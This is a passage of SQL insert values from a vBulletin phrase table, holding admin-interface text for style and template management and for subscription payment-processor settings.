(37845, -1, 'panel_surround_desc', 'style', 'This style is used for the thick border that surrounds the panel used for most forms.', 'vbulletin', '', 0, ''),
(37846, -1, 'please_be_aware_replacement_variable_is_inherited', 'style', 'Please be aware that if this replacement variable is inherited by child styles, they too will lose any customizations you have made for this replacement variable.', 'vbulletin', '', 0, ''),
(37847, -1, 'please_be_aware_template_is_inherited', 'style', 'Please be aware that if this template is inherited by child styles, they too will lose any customizations you have made for this template.', 'vbulletin', '', 0, ''),
(37848, -1, 'please_be_aware_this_will_delete_custom_templates', 'style', 'Please be aware that this will also delete all custom templates belonging to this style. Any child styles will attach themselves to this set\'s parent style.', 'vbulletin', '', 0, ''),
(37849, -1, 'poll_images_folder', 'style', 'Poll Images Folder\r\nThis folder contains the various images used to build the colored bars in poll voting results. ', 'vbulletin', '', 0, ''),
(37850, -1, 'popup_menu_body', 'style', 'Popup Menu Body', 'vbulletin', '', 0, ''),
(37851, -1, 'popup_menu_body_desc', 'style', 'This style is applied to the outer body of \'vbmenu\' popup menus.', 'vbulletin', '', 0, ''),
(37852, -1, 'popup_menu_control', 'style', 'Popup Menu Controls', 'vbulletin', '', 0, ''),
(37853, -1, 'popup_menu_control_desc', 'style', 'This style is applied to elements which, when clicked, will open a popup menu. For visual consistency, it is occasionally used simply to emphasize an element containing a clickable link.', 'vbulletin', '', 0, ''),
(37854, -1, 'popup_menu_hilite', 'style', 'Popup Menu Highlighted Option', 'vbulletin', '', 0, ''),
(37855, -1, 'popup_menu_hilite_desc', 'style', 'When a menu option is highlighted due to the mouse moving over it, it will temporarily be assigned this style.', 'vbulletin', '', 0, ''),
(37856, -1, 'popup_menu_option', 'style', 'Popup Menu Option Row', 'vbulletin', '', 0, ''),
(37857, -1, 'popup_menu_option_desc', 'style', 'This style is applied to each row inside a \'vbmenu\' popup menu.', 'vbulletin', '', 0, ''),
(37858, -1, 'post_icon', 'style', 'Post Icon', 'vbulletin', '', 0, ''),
(37859, -1, 'preview', 'style', 'Preview', 'vbulletin', '', 0, ''),
(37860, -1, 'rating_images_folder', 'style', 'Ratings Images Folder\r\nThis folder contains the images used to illustrate the rating applied to an item (usually a thread). ', 'vbulletin', '', 0, ''),
(37861, -1, 'rebuild_all_styles', 'style', 'Rebuild All Styles', 'vbulletin', '', 0, ''),
(37862, -1, 'regex_help', 'style', 'The regular expression option is for advanced users only ! Setting this option to \'yes\' will use preg_replace() instead of str_replace() for your find/replace operation. Do not use this option if you are not sure how to use PCRE regular expressions!', 'vbulletin', 'vBulletin Solutions', 1169547766, '3.6.5'),
(37863, -1, 'regular_expression_used', 'style', 'Regular Expression Used', 'vbulletin', '', 0, ''),
(37864, -1, 'replacement_variable', 'style', 'Replacement Variable', 'vbulletin', '', 0, ''),
(37865, -1, 'replacement_variable_is_customized_in_this_style', 'style', 'Replacement Variable is Customized in this Style', 'vbulletin', '', 0, ''),
(37866, -1, 'replacement_variable_is_inherited_from_a_parent_style', 'style', 'Replacement Variable is Inherited From a Parent Style', 'vbulletin', '', 0, ''),
(37867, -1, 'replacement_variable_is_unchanged_from_the_default_style', 'style', 'Replacement Variable is Unchanged From the Default Style', 'vbulletin', '', 0, ''),
(37868, -1, 'replacement_variable_manager', 'style', 'Replacement Variable Manager', 'vbulletin', '', 0, ''),
(37869, -1, 'replacement_variables', 'style', 'Replacement Variables', 'vbulletin', '', 0, ''),
(37870, -1, 'reputation_images_folder', 'style', 'Reputation Images Folder\r\nThis folder contains the small images used to display a user\'s current reputation. ', 'vbulletin', '', 0, ''),
(37871, -1, 'revert_all_templates', 'style', 'Revert all Templates', 'vbulletin', '', 0, ''),
(37872, -1, 'revert_all_templates_from_style_x', 'style', 'Are you sure you want to revert all templates from the style called \'{1}\'? \r\n \r\nThis will cause all templates in this style to revert to their default or inherited status. Custom templates that do not exist in this style\'s parent will not be affected. \r\n \r\nThe following templates will be reverted:\r\n\r\nThis action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1237467197, '3.8.2'),
(37873, -1, 'revert_this_group_of_settings', 'style', 'To revert this group of settings to their inherited value, check this box and submit the form.', 'vbulletin', 'vBulletin Solutions', 1209205296, '3.7.0'),
(37874, -1, 'save_and_reload', 'style', 'Save and Reload', 'vbulletin', 'vBulletin Solutions', 1190813573, '3.7.0 Beta 1'),
(37875, -1, 'save_css', 'style', 'Save CSS', 'vbulletin', '', 0, ''),
(37876, -1, 'save_in_template_history', 'style', 'Save in Template History?', 'vbulletin', '', 0, ''),
(37877, -1, 'search_in_all_styles', 'style', 'Search in all Styles', 'vbulletin', '', 0, ''),
(37878, -1, 'search_in_style', 'style', 'Search in Style', 'vbulletin', '', 0, ''),
(37879, -1, 'search_in_template', 'style', 'Search in Template', 'vbulletin', '', 0, ''),
(37880, -1, 'search_in_templates', 'style', 'Search in Templates', 'vbulletin', '', 0, ''),
(37881, -1, 'search_templates', 'style', 'Search Templates', 'vbulletin', '', 0, ''),
(37882, -1, 'second_alternating_color', 'style', 'Second Alternating Color', 'vbulletin', '', 0, ''),
(37883, -1, 'second_alternating_color_desc', 'style', 'Most table cells in vBulletin use either the First or Second alternating color as their background. Set the attributes for elements using \'Second Alternating Color\' here. ', 'vbulletin', '', 0, ''),
(37884, -1, 'selected_item', 'style', 'Selected Item', 'vbulletin', '', 0, ''),
(37885, -1, 'settings', 'style', 'Settings', 'vbulletin', '', 0, ''),
(37886, -1, 'show_default', 'style', 'Show Default', 'vbulletin', '', 0, ''),
(37887, -1, 'sizes_and_dimensions', 'style', 'Sizes and Dimensions', 'vbulletin', '', 0, ''),
(37888, -1, 'small_font', 'style', 'Small Font', 'vbulletin', '', 0, ''),
(37889, -1, 'small_font_desc', 'style', 'On occasions where smaller-than-normal text is required, this style will be applied.', 'vbulletin', '', 0, ''),
(37890, -1, 'spacer_size', 'style', 'Spacer Size (pixels) (Spacing between the body border and the main content) ', 'vbulletin', '', 0, ''),
(37891, -1, 'standard_css', 'style', 'Standard CSS Attributes', 'vbulletin', '', 0, ''),
(37892, -1, 'statusicon_folder', 'style', 'Item Status Icon Folder\r\nThis folder contains all the icons representing the status of forums, threads, posts etc. \r\nFor example: announcement_old.gif / announcement_new.gif ', 'vbulletin', '', 0, ''),
(37893, -1, 'strongly_recommend_testing_regex_replace', 'style', 'It is strongly recommended that you use the \'test\' option before actually performing a regex replace.', 'vbulletin', '', 0, ''),
(37894, -1, 'style_manager', 'style', 'Style Manager', 'vbulletin', '', 0, ''),
(37895, -1, 'table_border', 'style', 'Table Border', 'vbulletin', '', 0, ''),
(37896, -1, 'table_border_desc', 'style', '\'Table Border\' serves two purposes - primarily it is used to set the background color of all colored tables, which will show through in the color of the lines between cells. Secondly, you may wish to apply a border to the outside of the table itself.', 'vbulletin', '', 0, ''),
(37897, -1, 'table_cell_padding', 'style', 'Table Cell Padding (pixels) (This value allows you to set the cellpadding for all tables in vBulletin) ', 'vbulletin', '', 0, ''),
(37898, -1, 'table_footer', 'style', 'Table Footer', 'vbulletin', '', 0, ''),
(37899, -1, 'table_footer_desc', 'style', 'Some tables have an additional bar at their base to hold extra controls etc. \'Table Footer\' is used to style these.', 'vbulletin', '', 0, ''),
(37900, -1, 'table_header', 'style', 'Table Header', 'vbulletin', '', 0, ''),
(37901, -1, 'table_header_desc', 'style', '\'Table Header\' is most often used as the style for a column heading in a table, but is also occasionally used for the main title bar of a small table, such as \'Posting Rules\'.', 'vbulletin', '', 0, ''),
(37902, -1, 'template', 'style', 'Template', 'vbulletin', '', 0, ''),
(37903, -1, 'template_condition_contains_functions', 'style', 'The following template conditional expression contains function calls', 'vbulletin', '', 0, ''),
(37904, -1, 'template_edited_after_load', 'style', 'Template was edited after the page was loaded by {1}, the previous template was saved in the history.', 'vbulletin', 'vBulletin Solutions', 1176827685, '3.6.6'),
(37905, -1, 'template_eval_error', 'style', 'The following error occurred when attempting to evaluate this template:{1} This is likely caused by a malformed conditional statement. It is highly recommended that you fix this error before continuing, but you may continue as-is if you wish.', 'vbulletin', '', 0, ''),
(37906, -1, 'template_is_customized_in_this_style', 'style', 'Template is Customized in this Style', 'vbulletin', '', 0, ''),
(37907, -1, 'template_is_inherited_from_a_parent_style', 'style', 'Template is Inherited From a Parent Style', 'vbulletin', '', 0, ''),
(37908, -1, 'template_is_unchanged_from_the_default_style', 'style', 'Template is Unchanged From the Default Style', 'vbulletin', '', 0, ''),
(37909, -1, 'template_last_edited_js', 'style', 'Last edited {1} {2} {3} at {4}:{5} by {6}', 'vbulletin', '', 0, ''),
(37910, -1, 'template_options', 'style', 'Template Options', 'vbulletin', '', 0, ''),
(37911, -1, 'template_x_exists_error', 'style', 'A template named {1} already exists. \r\n \r\nIf you click \'Save\' the existing template will be overwritten.', 'vbulletin', '', 0, ''),
(37912, -1, 'temporary_template_table_created', 'style', 'Temporary Template Table Created', 'vbulletin', '', 0, ''),
(37913, -1, 'temporary_template_table_populated_with_x_templates', 'style', 'Temporary Template Table Populated with {1} Templates', 'vbulletin', '', 0, ''),
(37914, -1, 'temporary_template_table_renamed', 'style', 'Temporary Template Table Renamed', 'vbulletin', '', 0, ''),
(37915, -1, 'test_replace_only', 'style', 'Test Replacement Only (This will show you the results of doing this find/replace, without actually updating the templates) ', 'vbulletin', '', 0, ''),
(37916, -1, 'text_added_in_new_version', 'style', 'Text added in new version', 'vbulletin', '', 0, ''),
(37917, -1, 'text_ads_only', 'style', 'Text ads only', 'vbulletin', 'vBulletin Solutions', 1231170734, '3.8.0 Beta 4'),
(37918, -1, 'text_and_image_ads', 'style', 'Text and image ads', 'vbulletin', 'vBulletin Solutions', 1231170748, '3.8.0 Beta 4'),
(37919, -1, 'text_changed_between_versions', 'style', 'Text changed between versions', 'vbulletin', '', 0, ''),
(37920, -1, 'text_decoration', 'style', 'Text Decoration', 'vbulletin', '', 0, ''),
(37921, -1, 'text_desc', 'style', 'Use this control to set the text attributes for all text elements on the page that may ignore the \'Body\' attributes, in particular text inside <td> tags etc.', 'vbulletin', '', 0, ''),
(37922, -1, 'text_editor_control_desc', 'style', 'These settings allow you to control how controls on the WYSIWYG and standard text editor toolbars appear.', 'vbulletin', '', 0, ''),
(37923, -1, 'text_editor_controls_folder', 'style', 'Text Editor Controls Folder\r\nThis folder contains the button and interface images for the vBulletin text editor (used to post/edit messages) ', 'vbulletin', '', 0, ''),
(37924, -1, 'text_in_new_version', 'style', 'Text in New Version', 'vbulletin', 'vBulletin Solutions', 1220877228, '3.8.0 Alpha 1'),
(37925, -1, 'text_in_old_version', 'style', 'Text in Old Version', 'vbulletin', 'vBulletin Solutions', 1220877207, '3.8.0 Alpha 1'),
(37926, -1, 'text_removed_from_old_version', 'style', 'Text removed from old version', 'vbulletin', '', 0, ''),
(37927, -1, 'text_surrounding_changes', 'style', 'Text Surrounding Changes', 'vbulletin', 'vBulletin Solutions', 1220877259, '3.8.0 Alpha 1'),
(37928, -1, 'textarea_columns', 'style', 'Textarea Columns', 'vbulletin', '', 0, ''),
(37929, -1, 'this_item_is_customized_in_the_parent_style_called_x', 'style', 'This item is customized in the parent style called\\n\\n\'{1}\'.', 'vbulletin', '', 0, ''),
(37930, -1, 'this_template_has_been_customized_in_a_parent_style', 'style', 'This template has been customized within the {1} style, (a parent set of the {2} style). You may click the \'Customize\' button to create a customized version of this template, based on the customizations in the {1} style. If you would like to edit the {3} template within the {1} parent style, Click Here .', 'vbulletin', '', 0, ''),
(37931, -1, 'this_template_has_been_customized_in_this_style', 'style', 'This template has been customized in the current style. Double-click the template name or click the \'Edit\' button to modify the template. You may also view the original template, from which this template was customized, by clicking the \'View Original\' button.', 'vbulletin', '', 0, ''),
(37932, -1, 'this_template_has_not_been_customized', 'style', 'This template has not been customized in this style or any of its parent styles. Double-click the template name or click the \'Customize\' button to add a customized version of this template to the current style and its child sets.', 'vbulletin', '', 0, ''),
(37933, -1, 'time_color', 'style', 'Time Color', 'vbulletin', '', 0, ''),
(37934, -1, 'time_color_desc', 'style', '\'Time Color\' is applied to (most) instances of a time stamp being displayed.', 'vbulletin', '', 0, ''),
(37935, -1, 'title_for_uploaded_style', 'style', 'Title for Uploaded Style (Leave blank to use the style title specified in the style file) ', 'vbulletin', '', 0, ''),
(37936, -1, 'title_image', 'style', 'Title Image\r\nThis is the image located in the \'header\' template, used as the main logo for your forum. ', 'vbulletin', '', 0, ''),
(37937, -1, 'toolbar_menu_options', 'style', 'Toolbar Menu Options', 'vbulletin', '', 0, ''),
(37938, -1, 'type', 'style', 'Type', 'vbulletin', '', 0, ''),
(37939, -1, 'type_of_ads_to_show', 'style', 'Type of Ads to Show', 'vbulletin', 'vBulletin Solutions', 1231168447, '3.8.0 Beta 4'),
(37940, -1, 'unknown', 'style', 'Unknown', 'vbulletin', '', 0, ''),
(37941, -1, 'unsaved_data_may_be_lost', 'style', 'There is unsaved data on the page and it may be lost.', 'vbulletin', 'vBulletin Solutions', 1215700380, '3.8.0 Alpha 1'),
(37942, -1, 'updated_default_templates', 'style', 'Updated Default Templates', 'vbulletin', '', 0, ''),
(37943, -1, 'updated_default_templates_desc', 'style', 'The templates shown on this page have been updated in the default template set since you customized them. \r\n \r\nIt may be necessary for you to revert the custom templates, or otherwise check that they fully support vBulletin {1}. If you do not do this, some sections of vBulletin may not function! Please see the release announcements at the vBulletin.com Forums for more information.', 'vbulletin', '', 0, ''),
(37944, -1, 'updating_style_information_for_each_style', 'style', 'Updating style information for each style...', 'vbulletin', '', 0, ''),
(37945, -1, 'updating_style_information_for_x', 'style', 'Updating Style Information for \'{1}\' and child styles...', 'vbulletin', '', 0, ''),
(37946, -1, 'updating_styles_with_no_parents', 'style', 'Updating style sets with no parent information', 'vbulletin', '', 0, ''),
(37947, -1, 'updating_template_ids', 'style', 'Updating Template IDs', 'vbulletin', '', 0, ''),
(37948, -1, 'usage_in_expression', 'style', 'Usage in Expression', 'vbulletin', '', 0, ''),
(37949, -1, 'use_regular_expressions', 'style', 'Use Regular Expressions (see notes below) ', 'vbulletin', '', 0, ''),
(37950, -1, 'version', 'style', 'Version', 'vbulletin', '', 0, ''),
(37951, -1, 'view_history', 'style', 'View History', 'vbulletin', '', 0, ''),
(37952, -1, 'view_inline', 'style', 'View Inline', 'vbulletin', 'vBulletin Solutions', 1220452580, '3.8.0 Alpha 1'),
(37953, -1, 'view_original', 'style', 'View Original', 'vbulletin', '', 0, ''),
(37954, -1, 'view_quickref', 'style', 'View QuickRef', 'vbulletin', '', 0, ''),
(37955, -1, 'view_side_by_side', 'style', 'View Side by Side', 'vbulletin', 'vBulletin Solutions', 1220452615, '3.8.0 Alpha 1'),
(37956, -1, 'view_your_forum_using_this_style', 'style', 'View Your Forum Using this Style', 'vbulletin', '', 0, ''),
(37957, -1, 'viewing_version_of_x', 'style', 'Viewing Version of {1} ', 'vbulletin', '', 0, ''),
(37958, -1, 'visited_link', 'style', 'Visited', 'vbulletin', '', 0, ''),
(37959, -1, 'with_a_few_exceptions_function_calls_are_not_permitted', 'style', 'With a few exceptions, function calls are not permitted in template conditional expressions. Please go back and re-write this expression. The following functions are allowed in template conditional expressions:', 'vbulletin', '', 0, ''),
(37960, -1, 'wrap_text', 'style', 'Wrap Text', 'vbulletin', '', 0, ''),
(37961, -1, 'wysiwyg_editor_style', 'style', 'WYSIWYG Editor (Should usually be the same as \'{1}\' or \'{2}\')', 'vbulletin', '', 0, ''),
(37962, -1, 'wysiwyg_editor_style_desc', 'style', 'This style will be applied to the WYSIWYG editor message area. For a true what-you-see-is-what-you-get experience, this should share its settings with First Alternating Color\' but you can set whatever you choose.', 'vbulletin', '', 0, ''),
(37963, -1, 'x_links_css', 'style', '{1} Links CSS', 'vbulletin', '', 0, ''),
(37964, -1, 'x_templates', 'style', '{1} Templates', 'vbulletin', '', 0, ''),
(37965, -1, '2checkout_order_instructions', 'subscription', 'To pay for your subscription via 2Checkout click the button below and follow the onscreen instructions.', 'vbulletin', '', 0, ''),
(37966, -1, 'active', 'subscription', 'Active', 'vbulletin', '', 0, ''),
(37967, -1, 'add_new_paymentapi', 'subscription', 'Add New Payment API', 'vbulletin', '', 0, ''),
(37968, -1, 'add_new_subscription', 'subscription', 'Add New Subscription', 'vbulletin', '', 0, ''),
(37969, -1, 'add_user', 'subscription', 'Add User', 'vbulletin', '', 0, ''),
(37970, -1, 'all_currency', 'subscription', 'All Currency', 'vbulletin', 'vBulletin Solutions', 1146977622, '3.6.0 Beta 1'),
(37971, -1, 'all_processors', 'subscription', 'All Processors', 'vbulletin', 'vBulletin Solutions', 1146977612, '3.6.0 Beta 1'),
(37972, -1, 'all_subscriptions', 'subscription', 'All Subscriptions', 'vbulletin', 'vBulletin Solutions', 1153747100, '3.6.0 Release Candidate 3'),
(37973, -1, 'all_types', 'subscription', 'All Types', 'vbulletin', 'vBulletin Solutions', 1147109240, '3.6.0 Beta 1'),
(37974, -1, 'allowed_can_access_subscription', 'subscription', 'Allowed: Usergroup can access this subscription', 'vbulletin', 'vBulletin Solutions', 1146674853, '3.6.0 Beta 1'),
(37975, -1, 'amount', 'subscription', 'Amount', 'vbulletin', 'vBulletin Solutions', 1146872078, '3.6.0 Beta 1'),
(37976, -1, 'are_you_sure_want_to_delete_paymentapi_x', 'subscription', 'Are you sure you want to delete the Payment API called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(37977, -1, 'are_you_sure_want_to_delete_subscription_x', 'subscription', 'Are you sure you want to delete the subscription called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(37978, -1, 'aus_dollars', 'subscription', 'Australian Dollars', 'vbulletin', '', 0, ''),
(37979, -1, 'authorizenet_order_instructions', 'subscription', 'To pay for your subscription using Authorize.Net click the button below and follow the onscreen instructions.', 'vbulletin', '', 0, ''),
(37980, -1, 'available_subscriptions', 'subscription', 'Available Subscriptions', 'vbulletin', '', 0, ''),
(37981, -1, 'cad_dollars', 'subscription', 'Canadian Dollars', 'vbulletin', '', 0, ''),
(37982, -1, 'can_use_subscription', 'subscription', 'Can Use Subscription', 'vbulletin', 'vBulletin Solutions', 1146675379, '3.6.0 Beta 1'),
(37983, -1, 'ccbill_order_instructions', 'subscription', 'To pay for your subscription via CCBill click the button below and follow the onscreen instructions.', 'vbulletin', 'vBulletin Solutions', 1146781462, '3.6.0 Beta 1'),
(37984, -1, 'ccbill_subid', 'subscription', 'CCBill SubID', 'vbulletin', 'vBulletin Solutions', 1146862912, '3.6.0 Beta 1'),
(37985, -1, 'charge', 'subscription', 'Charge', 'vbulletin', 'vBulletin Solutions', 1146872154, '3.6.0 Beta 1'),
(37986, -1, 'classname', 'subscription', 'Classname', 'vbulletin', '', 0, ''),
(37987, -1, 'clickbank_order_instructions', 'subscription', 'To pay for your subscription using ClickBank click the button below and follow the onscreen instructions.', 'vbulletin', '', 0, ''),
(37988, -1, 'cost', 'subscription', 'Cost', 'vbulletin', '', 0, ''),
(37989, -1, 'currency', 'subscription', 'Currency', 'vbulletin', 'vBulletin Solutions', 1146977645, '3.6.0 Beta 1'),
(37990, -1, 'denied_can_not_access_subscription', 'subscription', 'Denied: Usergroup cannot access this subscription', 'vbulletin', 'vBulletin Solutions', 1146674871, '3.6.0 Beta 1'),
(37991, -1, 'doing_this_will_remove_additional_access_subscription', 'subscription', 'Doing this will remove any additional access given to users who purchased this subscription!', 'vbulletin', 'vBulletin Solutions', 1204200659, '3.7.0 Beta 6'),
(37992, -1, 'duration', 'subscription', 'Duration', 'vbulletin', '', 0, ''),
(37993, -1, 'edit_subscription_for_x', 'subscription', 'Edit Subscription for {1}', 'vbulletin', '', 0, ''),
(37994, -1, 'edit_usergroup_permissions_for_usergroup_x_in_subscription_y', 'subscription', 'Edit Subscription Permissions For Usergroup: {1} in Subscription {2}', 'vbulletin', 'vBulletin Solutions', 1146674753, '3.6.0 Beta 1'),
(37995, -1, 'euros', 'subscription', 'Euros', 'vbulletin', '', 0, ''),
(37996, -1, 'expiry_date', 'subscription', 'Expiry Date', 'vbulletin', '', 0, ''),
(37997, -1, 'failure', 'subscription', 'Failure', 'vbulletin', 'vBulletin Solutions', 1147202432, '3.6.0 Beta 1'),
(37998, -1, 'here_you_can_select_which_forums_the_user', 'subscription', 'Here you can select which forums the user will be able to access once subscribed. Selecting \"yes\" will allow this user access to the forum. Selecting \"default\" will use default permissions settings for their usergroup. (Please note that the permission inheritance system still works here) (Ensure that you have access masks enabled before attempting to use these!)', 'vbulletin', '', 0, ''),
(37999, -1, 'length_x_units_y_recurring_z', 'subscription', '{1} {2}{3}', 'vbulletin', '', 0, ''),
(38000, -1, 'moneybookers_order_instructions', 'subscription', 'To pay for your subscription using MoneyBookers click the button below and follow the onscreen instructions.', 'vbulletin', '', 0, ''),
(38001, -1, 'no_change', 'subscription', 'No Change', 'vbulletin', '', 0, ''),
(38002, -1, 'no_subscribed_discussions_to_display', 'subscription', 'There are no subscribed discussions for this time period.', 'vbulletin', 'vBulletin Solutions', 1213872807, '3.7.1'),
(38003, -1, 'nochex_order_instructions', 'subscription', 'To pay for your subscription using NOCHEX click the button below and follow the onscreen instructions.', 'vbulletin', '', 0, ''),
(38004, -1, 'order', 'subscription', 'Order', 'vbulletin', '', 0, ''),
(38005, -1, 'order_using_x', 'subscription', 'Order Using {1}', 'vbulletin', '', 0, ''),
(38006, -1, 'payment_api_manager', 'subscription', 'Payment API Manager', 'vbulletin', '', 0, ''),
(38007, -1, 'paymentapi', 'subscription', 'Payment API', 'vbulletin', '', 0, ''),
(38008, -1, 'paypal_only', 'subscription', 'PayPal Only', 'vbulletin', 'vBulletin Solutions', 1198800892, '3.7.0 Beta 4'),
(38009, -1, 'paypal_order_instructions', 'subscription', 'To pay for your subscription using PayPal click the button below and follow the onscreen instructions.', 'vbulletin', '', 0, ''),
(38010, -1, 'pounds_sterling', 'subscription', 'Pounds Sterling', 'vbulletin', '', 0, ''),
(38011, -1, 'processor', 'subscription', 'Processor', 'vbulletin', 'vBulletin Solutions', 1146871999, '3.6.0 Beta 1'),
(38012, -1, 'recurring', 'subscription', 'Recurring', 'vbulletin', '', 0, ''),
(38013, -1, 'required', 'subscription', 'Required', 'vbulletin', '', 0, ''),
(38014, -1, 'reversal', 'subscription', 'Reversal', 'vbulletin', 'vBulletin Solutions', 1146872142, '3.6.0 Beta 1'),
(38015, -1, 'select_payment_method', 'subscription', 'Select Payment Method', 'vbulletin', '', 0, ''),
(38016, -1, 'setting_2checkout_secret_word_desc', 'subscription', 'The secret word as set within the Look and Feel page of your 2Checkout account.', 'vbulletin', '', 0, ''),
(38017, -1, 'setting_2checkout_secret_word_title', 'subscription', '2Checkout Secret Word', 'vbulletin', '', 0, ''),
(38018, -1, 'setting_2checkout_twocheckout_id_desc', 'subscription', 'Your numerical vendor ID.', 'vbulletin', '', 0, ''),
(38019, -1, 'setting_2checkout_twocheckout_id_title', 'subscription', '2Checkout Vendor ID Number', 'vbulletin', '', 0, ''),
(38020, -1, 'setting_authorizenet_authorize_loginid_desc', 'subscription', 'Your Login ID for Authorize.Net.', 'vbulletin', '', 0, ''),
(38021, -1, 'setting_authorizenet_authorize_loginid_title', 'subscription', 'Authorize.Net Login ID', 'vbulletin', '', 0, ''),
(38022, -1, 'setting_authorizenet_authorize_md5secret_desc', 'subscription', 'The MD5 Hash Security key as specified within the Security section of the Authorize.Net merchant account system. (This is not required by default so a blank setting is possible)', 'vbulletin', '', 0, ''),
(38023, -1, 'setting_authorizenet_authorize_md5secret_title', 'subscription', 'MD5 Hash Security Key', 'vbulletin', '', 0, ''),
(38024, -1, 'setting_authorizenet_txnkey_desc', 'subscription', 'The transaction key as specified within the Security section of the Authorize.Net merchant account system.', 'vbulletin', '', 0, ''),
(38025, -1, 'setting_authorizenet_txnkey_title', 'subscription', 'Authorize.Net Transaction Key', 'vbulletin', '', 0, ''),
(38026, -1, 'setting_ccbill_clientAccnum_desc', 'subscription', 'This is the main account number for your CCBill account.', 'vbulletin', 'vBulletin Solutions', 1146780276, '3.6.0 Beta 1'),
(38027, -1, 'setting_ccbill_clientAccnum_title', 'subscription', 'CCBill Client Main Account Number', 'vbulletin', 'vBulletin Solutions', 1146779158, '3.6.0 Beta 1'),
(38028, -1, 'setting_ccbill_clientSubacc_desc', 'subscription', 'This is the four digit code that corresponds to the sub account that you have created within CCBill for use with vBulletin.', 'vbulletin', 'vBulletin Solutions', 1235559580, '3.8.2'),
(38029, -1, 'setting_ccbill_clientSubacc_title', 'subscription', 'CCBill Client Sub Account Number', 'vbulletin', 'vBulletin Solutions', 1146780224, '3.6.0 Beta 1'),
(38030, -1, 'setting_ccbill_formName_desc', 'subscription', 'The Form Name Code corresponds to the 3 (or more) digit code that you have created within CCBill for this sub account.', 'vbulletin', 'vBulletin Solutions', 1146779498, '3.6.0 Beta 1'),
(38031, -1, 'setting_ccbill_formName_title', 'subscription', 'CCBill Form Character Code', 'vbulletin', 'vBulletin Solutions', 1146779218, '3.6.0 Beta 1'),
(38032, -1, 'setting_ccbill_password_desc', 'subscription', 'This is the password to access the CCBill Datalink server. This is not required to utilize CCBill as a payment processor but it is required if you want subscriptions to be updated when a payment is refunded, voided, or charged back.', 'vbulletin', 'vBulletin Solutions', 1147362859, '3.6.0 Beta 1'),
(38033, -1, 'setting_ccbill_password_title', 'subscription', 'Datalink Password', 'vbulletin', 'vBulletin Solutions', 1147301764, '3.6.0 Beta 1'),
(38034, -1, 'setting_ccbill_secretword_desc', 'subscription', 'A secret word can be used to increase the security of accepting CCBill transactions. This is not required.', 'vbulletin', 'vBulletin Solutions', 1146779339, '3.6.0 Beta 1'),
(38035, -1, 'setting_ccbill_secretword_title', 'subscription', 'CCBill Secret Word', 'vbulletin', 'vBulletin Solutions', 1146779283, '3.6.0 Beta 1'),
(38036, -1, 'setting_ccbill_username_desc', 'subscription', 'This is the username to access the CCBill Datalink server. This is not required to utilize CCBill as a payment processor but it is required if you want subscriptions to be updated when a payment is refunded, voided, or charged back.', 'vbulletin', 'vBulletin Solutions', 1147362865, '3.6.0 Beta 1'),
(38037, -1, 'setting_ccbill_username_title', 'subscription', 'Datalink Username', 'vbulletin', 'vBulletin Solutions', 1147301755, '3.6.0 Beta 1'),
(38038, -1, 'setting_moneybookers_mbemail_desc', 'subscription', 'Please enter your MoneyBookers email, all references to the subscription service will use this email.', 'vbulletin', '', 0, ''),
(38039, -1, 'setting_moneybookers_mbemail_title', 'subscription', 'MoneyBookers Email', 'vbulletin', '', 0, ''),
(38040, -1, 'setting_moneybookers_mbsecret_desc', 'subscription', 'Secret Word in lowercase as typed into your Moneybookers Profile', 'vbulletin', '', 0, ''),
(38041, -1, 'setting_moneybookers_mbsecret_title', 'subscription', 'Moneybookers Secret Word', 'vbulletin', '', 0, ''),
(38042, -1, 'setting_nochex_ncxemail_desc', 'subscription', 'Please enter your NoChex email, all references to the subscription service will use this email.', 'vbulletin', '', 0, ''),
(38043, -1, 'setting_nochex_ncxemail_title', 'subscription', 'NoChex Email', 'vbulletin', '', 0, ''),
(38044, -1, 'setting_paypal_ppemail_desc', 'subscription', 'Please enter your PayPal email, all references to the subscription service will use this email.', 'vbulletin', '', 0, ''),
(38045, -1, 'setting_paypal_ppemail_title', 'subscription', 'PayPal Email', 'vbulletin', '', 0, ''),
(38046, -1, 'setting_paypal_primaryemail_desc', 'subscription', 'Your PayPal primary account email that corresponds to the address above, this is required for recurring subscription verification.', 'vbulletin', 'vBulletin Solutions', 1156437229, '3.6.1'),
(38047, -1, 'setting_paypal_primaryemail_title', 'subscription', 'PayPal Primary Account Email', 'vbulletin', 'vBulletin Solutions', 1198800883, '3.7.0 Beta 4'),
(38048, -1, 'setting_worldpay_worldpay_instid_desc', 'subscription', 'The Install ID that is generated by the WorldPay CMS for the subscription callback. Please read the manual for instructions on how to change the password.', 'vbulletin', '', 0, ''),
(38049, -1, 'setting_worldpay_worldpay_instid_title', 'subscription', 'WorldPay Installation ID', 'vbulletin', '', 0, ''),
(38050, -1, 'setting_worldpay_worldpay_password_desc', 'subscription', 'The password entered during the creation of the subscription callback within the WorldPay CMS.', 'vbulletin', '', 0, ''),
(38051, -1, 'setting_worldpay_worldpay_password_title', 'subscription', 'WorldPay Callback Password', 'vbulletin', '', 0, ''),
(38052, -1, 'shipping_address', 'subscription', 'Shipping Address', 'vbulletin', '', 0, ''),
(38053, -1, 'showing_subscriptions_x_to_y_of_z', 'subscription', 'Showing Subscriptions {1} to {2} of {3}', 'vbulletin', 'vBulletin Solutions', 1205925164, '3.7.0 Release Candidate 1'),
(38054, -1, 'showing_transactions_x_to_y_of_z', 'subscription', 'Showing Transactions {1} to {2} of {3}', 'vbulletin', 'vBulletin Solutions', 1205925179, '3.7.0 Release Candidate 1'),
(38055, -1, 'subscription_length', 'subscription', 'Subscription Length', 'vbulletin', '', 0, ''),
(38056, -1, 'subscription_manager', 'subscription', 'Subscription Manager', 'vbulletin', '', 0, ''),
(38057, -1, 'subscription_permissions', 'subscription', 'Subscription Permissions', 'vbulletin', 'vBulletin Solutions', 1146674771, '3.6.0 Beta 1'),
(38058, -1, 'subscription_permissions_manager', 'subscription', 'Subscription Permissions Manager', 'vbulletin', 'vBulletin Solutions', 1146674708, '3.6.0 Beta 1'),
(38059, -1, 'supported_currency', 'subscription', 'Supported Currency', 'vbulletin', '', 0, ''),
(38060, -1, 'supports_recurring', 'subscription', 'Supports Recurring Payments', 'vbulletin', '', 0, ''),
(38061, -1, 'tax', 'subscription', 'Tax', 'vbulletin', '', 0, ''),
(38062, -1, 'to_pay_for_your_subscription', 'subscription', 'To pay for your subscription, please click the order button next to your preferred payment method and follow the instructions on the following page.', 'vbulletin', '', 0, ''),
